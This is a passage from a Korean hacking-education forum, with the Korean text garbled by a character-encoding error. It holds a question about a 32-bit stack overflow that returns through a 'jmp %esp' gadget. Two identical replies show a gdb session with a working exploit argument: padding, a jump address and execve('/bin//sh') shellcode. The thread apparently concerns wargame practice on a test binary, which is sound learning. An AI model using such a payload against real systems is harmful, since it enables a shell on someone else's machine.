½Ã½ºÅÛ ÇØÅ·

 1574, 1/79 ȸ¿ø°¡ÀÔ  ·Î±×ÀΠ 
   lMaxl04
   http://1111
   ASLRÀÌ °É·ÁÀÖÀ»¶§ ret¿¡ ROPÀ¸·Î jmp %espÀ» »ç¿ëÇÑ °æ¿ì.

http://www.hackerschool.org/HS_Boards/zboard.php?id=QNA_system&no=2006 [º¹»ç]


32ºñÆ® ȯ°æÀÔ´Ï´Ù.

±âº»ÀûÀ¸·Î ½ºÅÃÀÇ ±¸Á¶°¡
buf
sfp
ret
À¸·Î ±¸¼ºµÇ¾îÀÖ°í

ÇÁ·Î±×·¥Àº
leave
ret
À¸·Î Á¾·áµÇ´Â °æ¿ì

¿©±â¼­ retÀ» jmp %espÀÇ ÁÖ¼Ò·Î »ç¿ëÇÏ¿´½À´Ï´Ù.

ÀÌ·ÐÀûÀ¸·Î leave¿¡¼­ mov %esp %ebp, pop %ebp
ret¿¡¼­ pop %eip, jmp %eip
°¡ µÇ¸ç,

º¯Á¶µÈ ½ºÅÃÀÇ ret ÁÖ¼Ò°¡ jmp %esp¸¦ ½ÇÇàÇϱ⠶§¹®¿¡
ret + 4ÀÇ Äڵ带 ¹Ù·Î ½ÇÇàÇÒ °ÍÀ¸·Î ¿¹»óÇÏ¿´´Âµ¥
½ÇÁ¦·Î´Â ret + 20 ¹ÙÀÌÆ® °¡·® µÚ¿¡ À§Ä¡Çؾ߸¸ ½ÇÇàÀÌ µÇ°í ÀÖ½À´Ï´Ù.

Ȥ½Ã ÃßÃøµÇ´Â »çÀ¯°¡ ÀÖÀ»±î¿ä?

  Hit : 1053     Date : 2022/06/29 06:05



    
cd80 ÀÌÇØÇϽŴë·Î ½ÇÇàµÇ´Â°Ô ¸Â½À´Ï´Ù
¾Æ·¡´Â ¿¹½ÃÀÔ´Ï´Ù
(gdb) b *main+63
Breakpoint 1 at 0x80491f5
(gdb) r $(perl -e 'print "A"x36, "\x08\xa0\x04\x08", "\x6a\x0b\x58\x99\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53\x89\xe1\xcd\x80"')
Starting program: /home/cd80/tmp/test $(perl -e 'print "A"x36, "\x08\xa0\x04\x08", "\x6a\x0b\x58\x99\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53\x89\xe1\xcd\x80"')

Breakpoint 1, 0x080491f5 in main ()
(gdb) si
0x0804a008 in ?? ()
(gdb) x/i $pc
=> 0x804a008: jmp *%esp
(gdb) i reg esp
esp 0xffffd3f0 0xffffd3f0
(gdb) si
0xffffd3f0 in ?? ()
(gdb) x/i $pc
=> 0xffffd3f0: push $0xb
(gdb)

½Ç¼ö¸¦ ÀǽÉÇغÁ¾ß ÇÒ °Í °°Àºµ¥
x/i [jmp espÁÖ¼Ò] ÇßÀ» ¶§ Á¤È®È÷ jmp *%esp ¸¸ ³ª¿À´ÂÁö¸¦ ¸ÕÀú üũÇغ¸¼Å¾ß Çϱ¸¿ä
½©ÄÚµåÀÇ ½ÃÀۺο¡´Â Àß µµ´ÞÇÏÁö¸¸ Áß°£¿¡ ¸Þ¸ð¸®¸¦ ¸Á°¡¶ß·Á Á¦´ë·Î ÀÛµ¿ÀÌ µÇÁö ¾Ê´Â°ÇÁöµµ È®ÀÎÇغ¸¼Å¾ß ÇÕ´Ï´Ù
2022/06/30  
lMaxl04 Áú¹®¿¡ ´ëÇÑ ¼³¸íÀÌ ºÎÁ·ÇÏÁø ¾Ê¾Ò³ª °ÆÁ¤Çߴµ¥ Àß ÀÌÇØÇØÁּż­ °¨»çÇÕ´Ï´Ù. Çϳª¾¿ ´Ù½Ã È®ÀÎÇغ¸°í½ÍÀºµ¥... ¾ÆÁ÷ ¸®¸ðÆ® ȯ°æ¿¡¼­ ÁÖ¼Ò¿Í °ª È®ÀÎÇÏ´Â ¹æ¹ýÀ» Àß ¸ô¶ó Á¶±Ý ´õ °í¹ÎÇغÁ¾ß°Ú½À´Ï´Ù ¤Ð¤Ð 2022/06/30  
somass ÀÌÇØÇϽŴë·Î ½ÇÇàµÇ´Â°Ô ¸Â½À´Ï´Ù
¾Æ·¡´Â ¿¹½ÃÀÔ´Ï´Ù
(gdb) b *main+63
Breakpoint 1 at 0x80491f5
(gdb) r $(perl -e 'print "A"x36, "\x08\xa0\x04\x08", "\x6a\x0b\x58\x99\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53\x89\xe1\xcd\x80"')
Starting program: /home/cd80/tmp/test $(perl -e 'print "A"x36, "\x08\xa0\x04\x08", "\x6a\x0b\x58\x99\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53\x89\xe1\xcd\x80"')

Breakpoint 1, 0x080491f5 in main ()
(gdb) si
0x0804a008 in ?? ()
(gdb) x/i $pc
=> 0x804a008: jmp *%esp
(gdb) i reg esp
esp 0xffffd3f0 0xffffd3f0
(gdb) si
0xffffd3f0 in ?? ()
(gdb) x/i $pc
=> 0xffffd3f0: push $0xb
(gdb)

½Ç¼ö¸¦ ÀǽÉÇغÁ¾ß ÇÒ °Í °°Àºµ¥
x/i [jmp espÁÖ¼Ò] ÇßÀ» ¶§ Á¤È®È÷ jmp *%esp ¸¸ ³ª¿À´ÂÁö¸¦ ¸ÕÀú üũÇغ¸¼Å¾ß Çϱ¸¿ä
½©ÄÚµåÀÇ ½ÃÀۺο¡´Â Àß µµ´ÞÇÏÁö¸¸ Áß°£¿¡ ¸Þ¸ð¸®¸¦ ¸Á°¡¶ß·Á Á¦´ë·Î ÀÛµ¿ÀÌ µÇÁö ¾Ê´Â°ÇÁöµµ È®ÀÎÇغ¸¼Å¾ß ÇÕ´Ï´Ù
2022/09/16  
1574   pwnable.kr echo1 Áú¹®2 (½ºÆ÷ ÁÖÀÇ)[2]     turttle2s
10/05 1134
1573   LOB GATE¹®Á¦ Ç®¸é¼­ ±Ã±ÝÇÑÁ¡[3]     hackxx123
08/24 808
1572   libc°ü·Ã - 2[5]     lMaxl04
08/24 800
  ASLRÀÌ °É·ÁÀÖÀ»¶§ ret¿¡ ROPÀ¸·Î jmp %espÀ» »ç¿ëÇÑ °æ¿ì.[3]     lMaxl04
06/29 1052
1570   ¸®¸ðÆ® ȯ°æ¿¡¼­ÀÇ ½ºÅà ÁÖ¼Ò È®ÀÎ ¹æ¹ýÀÌ ±Ã±ÝÇÕ´Ï´Ù.[2]     lMaxl04
06/16 860
1569   ÇØÅ· ÇÁ¸®¼­¹ö ¾ø¾îÁ³³ª¿ä?[1]     terfkim
04/15 1619
1568   ½ºÅÿ¡ µ¥ÀÌÅÍ ³ÖÀ» ¶§ SIGSEGV[4]     turttle2s
02/04 1362
1567   pwnable.kr echo1 Áú¹®[2]     turttle2s
06/17 1635
1566   ROP strcpy °ü·Ã Áú¹®ÀÔ´Ï´Ù.[3]     heeyoung0511
06/16 1500
1565   Level2 -> Level3 ¿¡¼­ vi¿Í /usr/bin/EditorÀÇ Â÷ÀÌ[2]     hyemin1826
07/18 1722
1564   Trainer3 ftz.hackerschool.org È£½ºÆ® Á¢¼Ó ºÒ°¡[1]     hyemin1826
07/18 3093
1563   dllÀÎÁ§¼Ç ½ÇÇèÁß Áú¹® µå¸³´Ï´Ù.[1]     kkk477
05/31 1772
1562   ÆÐŶ º¹È£È­¸¦ ¸¶½ºÅÍ ÇÏ·Á¸é ¾î¶² °úÁ¤ÀÌ ÀÖ¾î¾ßÇϳª¿ä?     sa0814
04/01 1615
1561   »ç±â[2]     jas08
03/31 1912
1560   ½Ã½ºÅÛ ÄÝÀÌ °¡´ÉÇÑ ¸Þ¸ð¸® ¿µ¿ª°ú ºÒ°¡´ÉÇÑ ¸Þ¸ð¸® ¿µ¿ªÀÌ Á¸ÀçÇϳª¿ä?     ocal
03/30 1660
1559   pwntools »ç¿ë½Ã¿Í ±âº» socket ¸ðµâ ÀÌ¿ë½Ã Â÷ÀÌ?[4]     ocal
01/09 2177
1558   lob level19(nightmare) °ü·ÃÁú¹®[1]     dnjsdnwja
12/18 1671
1557   ftz level2 Áú¹®ÀÖ½À´Ï´Ù[1]     kihyun1998
12/13 1763
1556   ftz level2¹ø Ǫ´Âµ¥¿ä ±ÇÇÑÀÌ...     kihyun1998
12/06 1638
1555   ½Ã½ºÅÛÇØÅ·ÇÒ¶§ [3]     thsrhkdwns
12/05 2107
1 [2][3][4][5][6][7][8][9][10]..[79]

Copyright 1999-2024 Zeroboard / skin by Hackerschool.org / Secure Patch by Hackerschool.org